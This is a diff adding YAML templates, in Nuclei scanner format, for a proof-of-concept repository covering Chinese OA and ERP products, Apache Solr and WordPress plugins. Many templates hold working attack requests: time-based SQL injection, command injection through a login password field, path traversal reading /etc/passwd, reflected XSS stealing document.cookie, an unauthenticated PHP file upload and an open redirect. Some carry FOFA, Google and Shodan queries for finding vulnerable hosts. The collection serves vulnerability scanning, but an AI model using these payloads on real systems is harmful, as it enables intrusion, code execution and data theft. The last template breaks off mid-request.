b/poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml new file mode 100644 index 0000000000..2c70d7a8b4 --- /dev/null +++ b/poc/auth/fanwei-Ecology-LoginSSO-sqli.yaml @@ -0,0 +1,29 @@ +id: fanwei-Ecology-LoginSSO-sqli + +info: + name: fanwei-Ecology-LoginSSO-sqli + author: PokerSec + severity: high + metadata: + fofasearch: app="泛微-OA(e-cology)" + +requests: + - raw: + - |+ + GET /weaver/FileDownloadLocation/login/LoginSSO.%2520jsp?ddcode=7ea7ef3c41d67297&mrfuuid=1%27;if+db_name(1)=%27master%27+WAITFOR+delay+%270:0:3%27--+&mailid=0&a=.swf HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + + matchers: + - type: dsl + condition: and + dsl: + - duration > 3 && duration < 6 && status_code==302 + + + + extractors: + - type: dsl + dsl: + - duration \ No newline at end of file diff --git a/poc/auth/hamlintek-ISS-7000-login_handler-rce.yaml b/poc/auth/hamlintek-ISS-7000-login_handler-rce.yaml new file mode 100644 index 0000000000..1abd80a6f3 --- /dev/null +++ b/poc/auth/hamlintek-ISS-7000-login_handler-rce.yaml @@ -0,0 +1,22 @@ +id: hamlintek-ISS-7000-login_handler-rce + +info: + name: hamlintek-ISS-7000-login_handler-rce + author: PokerSec + severity: critical + metadata: + fofasearch: body="css/login_form_style-06.css" + +http: + - raw: + - | + POST /login_handler.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=admin&password=admin;id;&uilng=3&button=%E7%99%BB%E5%85%A5&Signin= + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"uid=0") && contains_all(body,"gid=0") && contains_all(header,"ISS-7000 v2") diff --git a/poc/auth/ider-login-77ccffccfac1bb6eac46823913cc705c.yaml b/poc/auth/ider-login-77ccffccfac1bb6eac46823913cc705c.yaml new file mode 100644 index 0000000000..da1d397ffa --- /dev/null +++ b/poc/auth/ider-login-77ccffccfac1bb6eac46823913cc705c.yaml @@ -0,0 +1,59 @@ +id: ider-login-77ccffccfac1bb6eac46823913cc705c + +info: + name: > + IDer Login for WordPress <= 2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/de602cf8-cc02-4459-aa23-5d8236048bca?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ider-login/" + google-query: inurl:"/wp-content/plugins/ider-login/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ider-login,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ider-login/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ider-login" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1') \ No newline at end of file diff --git a/poc/auth/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml b/poc/auth/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml new file mode 100644 index 0000000000..370bcc7cbf --- /dev/null +++ b/poc/auth/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml @@ -0,0 +1,20 @@ +id: mingyuanyun_ERP_GetErpConfig_unauthorized + +info: + name: mingyuanyun_ERP_GetErpConfig_unauthorized + author: PokerSec + severity: high + metadata: + fofasearch: body="报表服务已正常运行" + + +http: + - raw: + - | + GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"AdminUserCode") && contains_all(body,"ErpKey") \ No newline at end of file diff --git a/poc/auth/solr-PKIAuthenticationPlugin-admin-bypass.yaml b/poc/auth/solr-PKIAuthenticationPlugin-admin-bypass.yaml new file mode 100644 index 0000000000..3d7b08cba0 --- /dev/null +++ b/poc/auth/solr-PKIAuthenticationPlugin-admin-bypass.yaml @@ -0,0 +1,21 @@ +id: solr-PKIAuthenticationPlugin-admin-bypass + +info: + name: solr-PKIAuthenticationPlugin-admin-bypass + author: PokerSec + severity: high + metadata: + fofasearch: app="APACHE-Solr" + +requests: + - raw: + - |+ + GET /solr/admin/info/properties:/admin/info/key HTTP/1.1 + Host: {{Hostname}} + SolrAuth: XXXXX + + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"system.properties") && contains_all(body,"Eclipse Adoptium") \ No newline at end of file diff --git a/poc/auth/yongyou-BIP-yonbiplogin-fileread.yaml b/poc/auth/yongyou-BIP-yonbiplogin-fileread.yaml new file mode 100644 index 0000000000..018aa72ff8 --- /dev/null +++ b/poc/auth/yongyou-BIP-yonbiplogin-fileread.yaml @@ -0,0 +1,19 @@ +id: yongyou-BIP-nginx-lua-fileread + +info: + name: yongyou-BIP-nginx-lua-fileread + author: PokerSec + severity: critical + metadata: + fofasearch: "iuap-apcom-workbench/" + +http: + - raw: + - | + GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg.js HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - contains_all(body,"root:x") && status_code==200 && contains_all(body,"daemon:x") && contains_all(body,"Password","ArrayOfOlapConnection") \ No newline at end of file diff --git a/poc/backup/indeed-wp-superbackup.yaml b/poc/backup/indeed-wp-superbackup.yaml new file mode 100644 index 0000000000..56b18b8b9e --- /dev/null +++ b/poc/backup/indeed-wp-superbackup.yaml @@ -0,0 +1,59 @@ +id: indeed-wp-superbackup-617a1d8a65bee9cf7b98f71587d5bbf1 + +info: + name: > + Super Backup & Clone - Migrate for WordPress <= 2.3.3 - Unauthenticated Arbitrary File Upload + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7c31d9b3-38b1-49a1-b361-ffe97e02bff0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/indeed-wp-superbackup/" + google-query: inurl:"/wp-content/plugins/indeed-wp-superbackup/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,indeed-wp-superbackup,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/indeed-wp-superbackup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "indeed-wp-superbackup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3.3') \ No newline at end of file diff --git a/poc/cnvd/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml b/poc/cnvd/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml new file mode 100644 index 0000000000..85846ae883 --- /dev/null +++ b/poc/cnvd/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml @@ -0,0 +1,28 @@ +id: fanwei-Ecology-browser-sqli + +info: + name: fanwei-Ecology-browser-sqli + author: PokerSec + severity: high + metadata: + fofasearch: app="泛微-OA(e-cology)" + +requests: + - raw: + - |- + POST /mobile/%20/plugin/browser.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%32%25%33%37%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%39%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - countSql + - baseSql + - type: status + status: + - 200 diff --git a/poc/config/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml b/poc/config/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml new file mode 100644 index 0000000000..370bcc7cbf --- /dev/null +++ b/poc/config/mingyuanyun_ERP_GetErpConfig_unauthorized.yaml @@ -0,0 +1,20 @@ +id: mingyuanyun_ERP_GetErpConfig_unauthorized + +info: + name: mingyuanyun_ERP_GetErpConfig_unauthorized + author: PokerSec + severity: high + metadata: + fofasearch: body="报表服务已正常运行" + + +http: + - raw: + - | + GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code==200 && contains_all(body,"AdminUserCode") && contains_all(body,"ErpKey") \ No newline at end of file diff --git a/poc/cve/CVE-2011-5107-2102.yaml b/poc/cve/CVE-2011-5107-2102.yaml new file mode 100644 index 0000000000..e39df48274 --- /dev/null +++ b/poc/cve/CVE-2011-5107-2102.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-5107 +info: + name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: A cross-site scripting vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107 https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-alert-before-your-post-cross-site-scripting-0-1-1/ + tags: cve,cve2011,wordpress,xss,wp-plugin + classification: + cve-id: CVE-2011-5107 +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/21 diff --git a/poc/cve/CVE-2014-4536-2354.yaml b/poc/cve/CVE-2014-4536-2354.yaml new file mode 100644 index 0000000000..b2485663df --- /dev/null +++ b/poc/cve/CVE-2014-4536-2354.yaml @@ -0,0 +1,41 @@ +id: CVE-2014-4536 + +info: + name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting + author: daffainfo + severity: medium + description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter. + reference: + - https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f + - https://nvd.nist.gov/vuln/detail/CVE-2014-4536 + - http://wordpress.org/plugins/infusionsoft/changelog + - http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2014-4536 + cwe-id: CWE-79 + tags: cve,cve2014,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/CVE-2014-9094-2422.yaml b/poc/cve/CVE-2014-9094-2422.yaml new file mode 100644 index 0000000000..8e73d7da9b --- /dev/null +++ b/poc/cve/CVE-2014-9094-2422.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-9094 + +info: + name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting + author: daffainfo + severity: medium + description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." + reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + tags: cve,cve2014,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2015-2807-2500.yaml b/poc/cve/CVE-2015-2807-2500.yaml new file mode 100644 index 0000000000..b39565c245 --- /dev/null +++ b/poc/cve/CVE-2015-2807-2500.yaml @@ -0,0 +1,32 @@ +id: CVE-2015-2807 + +info: + name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: + - https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-2807 + tags: cve,cve2015,wordpress,wp-plugin,xss + description: "Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter." + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2017-17043-2977.yaml b/poc/cve/CVE-2017-17043-2977.yaml new file mode 100644 index 0000000000..027f5d2142 --- /dev/null +++ b/poc/cve/CVE-2017-17043-2977.yaml @@ -0,0 +1,35 @@ +id: CVE-2017-17043 + +info: + name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 + + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17043 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/CVE-2019-25221.yaml b/poc/cve/CVE-2019-25221.yaml new file mode 100644 index 0000000000..99e90b3a73 --- /dev/null +++ b/poc/cve/CVE-2019-25221.yaml @@ -0,0 +1,59 @@ +id: CVE-2019-25221-86298068dfd5127aa948cb7fa748c15a + +info: + name: > + Responsive Filterable Portfolio <=1.0.8 - Authenticated (Admin+) SQL Injection + author: topscoder + severity: low + description: > + The Responsive Filterable Portfolio plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97827e26-d418-4c96-b0d0-10b92a4513bd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2019-25221 + metadata: + fofa-query: "wp-content/plugins/responsive-filterable-portfolio/" + google-query: inurl:"/wp-content/plugins/responsive-filterable-portfolio/" + shodan-query: 'vuln:CVE-2019-25221' + tags: cve,wordpress,wp-plugin,responsive-filterable-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/responsive-filterable-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "responsive-filterable-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.8') \ No newline at end of file diff --git a/poc/cve/CVE-2020-11023.yaml b/poc/cve/CVE-2020-11023.yaml new file mode 100644 index 0000000000..dac97e4330 --- /dev/null +++ b/poc/cve/CVE-2020-11023.yaml @@ -0,0 +1,59 @@ +id: CVE-2020-11023-3beb604b5149be28498143011514aa9e + +info: + name: > + jQuery Manager for WordPress <= 1.10.4 - Running Vulnerable Dependency + author: topscoder + severity: medium + description: > + The jQuery Manager for WordPress plugin for WordPress is running a vulnerable version of jQuery in all versions up to, and including, 1.10.4. This makes it possible for unauthenticated attackers to malicious web scripts, though it is not verified that the plugin is exploitable through CVE-2020-11023. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/21a27a8b-f599-42b9-9439-4456995dd3fe?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2020-11023 + metadata: + fofa-query: "wp-content/plugins/jquery-manager/" + google-query: inurl:"/wp-content/plugins/jquery-manager/" + shodan-query: 'vuln:CVE-2020-11023' + tags: cve,wordpress,wp-plugin,jquery-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jquery-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jquery-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.10.4') \ No newline at end of file diff --git a/poc/cve/CVE-2020-24186-4793.yaml b/poc/cve/CVE-2020-24186-4793.yaml new file mode 100644 index 0000000000..3889ec4b1a --- /dev/null +++ b/poc/cve/CVE-2020-24186-4793.yaml @@ -0,0 +1,83 @@ +id: CVE-2020-24186 + +info: + name: Unauthenticated File upload wpDiscuz WordPress plugin RCE + author: Ganofins + severity: critical + description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site’s server. + reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md + tags: cve,cve2020,wordpress,wp-plugin,rce,upload + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2020-24186 + cwe-id: CWE-434 + +requests: + - raw: + - | + GET /?p=1 HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak + Origin: {{BaseURL}} + Referer: {{BaseURL}} + + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="action" + + wmuUploadFiles + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="wmu_nonce" + + {{wmuSecurity}} + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="wmuAttachmentsData" + + undefined + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="wmu_files[0]"; filename="rce.php" + Content-Type: image/png + + {{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}} + + ------WebKitFormBoundary88AhjLimsDMHU1Ak + Content-Disposition: form-data; name="postId" + + 1 + ------WebKitFormBoundary88AhjLimsDMHU1Ak-- + + extractors: + - type: regex + part: body + internal: true + name: wmuSecurity + group: 1 + regex: + - 'wmuSecurity":"([a-z0-9]+)' + + - type: regex + part: body + group: 1 + regex: + - '"url":"([a-z:\\/0-9-.]+)"' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'success":true' + - 'fullname' + - 'shortname' + - 'url' + condition: and + part: body diff --git a/poc/cve/CVE-2020-35234-5026.yaml b/poc/cve/CVE-2020-35234-5026.yaml new file mode 100644 index 0000000000..9628bcfd78 --- /dev/null +++ b/poc/cve/CVE-2020-35234-5026.yaml @@ -0,0 +1,45 @@ +id: CVE-2020-35234 + +info: + name: SMTP WP Plugin Directory Listing + author: PR3R00T + severity: high + description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access. + impact: | + Low: Information disclosure + remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-35234 + - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/ + - https://wordpress.org/plugins/easy-wp-smtp/#developers + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-35234 + cwe-id: CWE-532 + epss-score: 0.37649 + epss-percentile: 0.97105 + cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: wp-ecommerce + product: easy_wp_smtp + framework: wordpress + tags: cve2020,cve,wordpress,wp-plugin,smtp,wp-ecommerce + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/" + - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/" + + matchers: + - type: word + words: + - "debug" + - "log" + - "Index of" + condition: and +# digest: 4a0a00473045022100b5b245278cf9f882c12ccd7f432d9ad044ce3e1d7d1040268987c3b0da6b38dc02206edf464d73fbe6176784b8e1f637bf87e468ab8a348d61afba6779c4abe0d4d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-25111-5802.yaml b/poc/cve/CVE-2021-25111-5802.yaml new file mode 100644 index 0000000000..506e3d7994 --- /dev/null +++ b/poc/cve/CVE-2021-25111-5802.yaml @@ -0,0 +1,26 @@ +id: CVE-2021-25111 + +info: + name: English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect + author: akincibor + severity: medium + description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue. + reference: + - https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4 + tags: wp-plugin,redirect,wordpress,wp,cve,cve2021,unauth + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-25111 + cwe-id: CWE-601 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/CVE-2022-1597-6652.yaml b/poc/cve/CVE-2022-1597-6652.yaml new file mode 100644 index 0000000000..484e845f2c --- /dev/null +++ b/poc/cve/CVE-2022-1597-6652.yaml @@ -0,0 +1,74 @@ +id: CVE-2022-1597 + +info: + name: WordPress WPQA <5.4 - Cross-Site Scripting + author: veshraj + severity: medium + description: | + WordPress WPQA plugin prior to 5.4 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter on its reset password form. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. + remediation: | + Upgrade WordPress WPQA to version 5.4 or later, which includes proper input sanitization to mitigate this vulnerability. + reference: + - https://wpscan.com/vulnerability/faff9484-9fc7-4300-bdad-9cd8a30a9a4e + - https://nvd.nist.gov/vuln/detail/CVE-2022-1597 + - https://github.com/trhacknon/Pocingit + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1597 + cwe-id: CWE-79 + epss-score: 0.00188 + epss-percentile: 0.55258 + cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 2 + vendor: 2code + product: wpqa_builder + framework: wordpress + google-query: inurl:/wp-content/plugins/wpqa + tags: cve,cve2022,wpscan,xss,wordpress,wp-plugin,wp,wpqa,2code +variables: + user: "{{to_lower(rand_base(5))}}" + pass: "{{user}}{{to_lower(rand_base(3))}}" + redirect_to: '">' + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 + Content-Type: application/x-www-form-urlencoded + + user_name={{user}}&email={{user}}@{{Host}}&pass1={{pass}}&pass2={{pass}}&phone={{rand_text_numeric(10)}}&agree_terms=on&form_type=wpqa-signup&action=wpqa_ajax_signup_process + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 + Content-Type: application/x-www-form-urlencoded + + 